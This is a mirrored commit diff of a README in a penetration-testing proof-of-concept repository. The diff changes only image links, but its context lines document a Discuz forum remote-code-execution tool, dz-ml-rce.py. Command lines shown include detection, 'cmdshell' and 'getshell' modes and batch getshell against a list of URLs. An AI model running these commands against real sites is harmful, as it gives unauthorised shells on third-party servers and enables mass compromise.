mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2026-05-30 19:45:58 +08:00
update README.md
This commit is contained in:
@@ -30,37 +30,37 @@ pip -r requirements.txt
|
||||
使用帮助<br/>
|
||||
python dz-ml-rce.py -h<br/>
|
||||
|
||||

|
||||

|
||||
|
||||
<br/>
|
||||
判断模式<br/>
|
||||
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" <br/>
|
||||
|
||||

|
||||

|
||||
|
||||
<br/>
|
||||
cmdshell模式<br/>
|
||||
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --cmdshell<br/>
|
||||
|
||||

|
||||

|
||||
|
||||
<br/>
|
||||
getshell模式<br/>
|
||||
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --getshell<br/>
|
||||
|
||||

|
||||

|
||||
|
||||
<br/>
|
||||
批量检测<br/>
|
||||
python dz-ml-rce.py -f urls.txt<br/>
|
||||
|
||||

|
||||

|
||||
|
||||
<br/>
|
||||
批量getshell<br/>
|
||||
python dz-ml-rce.py -f urls.txt --getshell<br/>
|
||||
|
||||

|
||||

|
||||
|
||||
|
||||
----------------
|
||||
|
||||
Reference in New Issue
Block a user